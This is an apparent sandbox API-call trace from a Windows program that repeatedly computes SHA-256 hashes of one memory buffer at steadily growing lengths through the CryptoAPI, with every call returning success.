	[0187.405] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.406] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.406] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0187.406] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.406] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e9a0
	[0187.406] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e9a0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e9a0, pdwDataLen=0x128aac) returned 1
	[0187.406] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.406] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.406] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.406] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.406] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0187.406] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.406] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e9c8
	[0187.406] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272e9c8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e9c8, pdwDataLen=0x128aac) returned 1
	[0187.406] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.406] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.406] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.407] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.407] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0187.407] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.407] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272e9f0
	[0187.407] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272e9f0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272e9f0, pdwDataLen=0x128aac) returned 1
	[0187.407] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.407] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.407] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.407] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.407] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0187.408] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ea18
	[0187.408] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ea18, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ea18, pdwDataLen=0x128aac) returned 1
	[0187.408] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.408] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.408] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.408] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.408] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0187.408] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.408] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ea40
	[0187.408] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ea40, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ea40, pdwDataLen=0x128aac) returned 1
	[0187.408] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.408] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.408] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.408] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.408] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0187.409] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ea68
	[0187.409] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ea68, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ea68, pdwDataLen=0x128aac) returned 1
	[0187.409] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.409] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.409] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.409] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.409] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0187.409] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.409] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ea90
	[0187.409] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ea90, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ea90, pdwDataLen=0x128aac) returned 1
	[0187.409] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.409] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.409] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.409] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.410] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0187.410] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.410] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eab8
	[0187.410] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272eab8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eab8, pdwDataLen=0x128aac) returned 1
	[0187.410] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.410] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.410] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.410] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.410] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0187.410] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.410] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eae0
	[0187.410] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272eae0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eae0, pdwDataLen=0x128aac) returned 1
	[0187.410] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.410] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.410] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.410] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.410] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0187.411] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eb08
	[0187.411] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272eb08, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eb08, pdwDataLen=0x128aac) returned 1
	[0187.411] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.411] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.411] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.411] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.411] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0187.411] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.411] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eb30
	[0187.411] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272eb30, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eb30, pdwDataLen=0x128aac) returned 1
	[0187.411] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.411] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.411] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.412] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.412] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0187.412] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.412] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eb58
	[0187.412] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272eb58, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eb58, pdwDataLen=0x128aac) returned 1
	[0187.412] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.412] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.412] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.412] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.412] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0187.412] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.412] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eb80
	[0187.412] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272eb80, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eb80, pdwDataLen=0x128aac) returned 1
	[0187.412] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.412] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.412] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.413] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.413] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0187.413] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.413] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272eba8
	[0187.413] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272eba8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272eba8, pdwDataLen=0x128aac) returned 1
	[0187.413] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.413] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.413] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.413] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.413] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0187.413] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.413] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ebd0
	[0187.413] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ebd0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ebd0, pdwDataLen=0x128aac) returned 1
	[0187.413] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.413] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.413] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.414] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.414] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0187.414] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ebf8
	[0187.414] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ebf8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ebf8, pdwDataLen=0x128aac) returned 1
	[0187.414] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.414] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.414] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.414] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.414] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0187.414] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.414] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ec20
	[0187.414] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ec20, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ec20, pdwDataLen=0x128aac) returned 1
	[0187.414] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.414] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.414] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.415] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.415] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0187.415] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.415] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ec48
	[0187.415] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ec48, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ec48, pdwDataLen=0x128aac) returned 1
	[0187.415] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.415] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.415] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.415] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.415] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0187.415] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.415] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ec70
	[0187.415] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ec70, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ec70, pdwDataLen=0x128aac) returned 1
	[0187.415] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.415] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.415] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.416] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.416] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0187.416] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.416] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ec98
	[0187.416] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ec98, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ec98, pdwDataLen=0x128aac) returned 1
	[0187.416] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.416] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.416] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.416] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.416] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0187.416] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.416] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ecc0
	[0187.416] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ecc0, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ecc0, pdwDataLen=0x128aac) returned 1
	[0187.416] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.416] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.417] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.417] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.417] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0187.417] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ece8
	[0187.417] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ece8, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ece8, pdwDataLen=0x128aac) returned 1
	[0187.417] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.417] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.417] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.417] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.417] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0187.417] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.417] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ed10
	[0187.417] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ed10, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ed10, pdwDataLen=0x128aac) returned 1
	[0187.417] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.418] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.418] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.418] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.418] CryptHashData (hHash=0x22b6840, pbData=0x272d4d0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0187.418] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ed38
	[0187.418] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x272ed38, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ed38, pdwDataLen=0x128aac) returned 1
	[0187.418] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0187.418] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
	[0187.418] CryptAcquireContextW (in: phProv=0x128ab0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ab0*=0x2256c0) returned 1
	[0187.418] CryptCreateHash (in: hProv=0x2256c0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128ab4 | out: phHash=0x128ab4) returned 1
	[0187.418] CryptHashData (hHash=0x22b68c0, pbData=0x272d4d0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0187.418] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x4, pbData=0x128aac, pdwDataLen=0x128aa8, dwFlags=0x0 | out: pbData=0x128aac, pdwDataLen=0x128aa8) returned 1
	[0187.418] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272ed60
	[0187.418] CryptGetHashParam (in: hHash=0x22b68c0, dwParam=0x2, pbData=0x272ed60, pdwDataLen=0x128aac, dwFlags=0x0 | out: pbData=0x272ed60, pdwDataLen=0x128aac) returned 1
	[0187.418] CryptDestroyHash (hHash=0x22b68c0) returned 1
	[0187.419] CryptReleaseContext (hProv=0x2256c0, dwFlags=0x0) returned 1
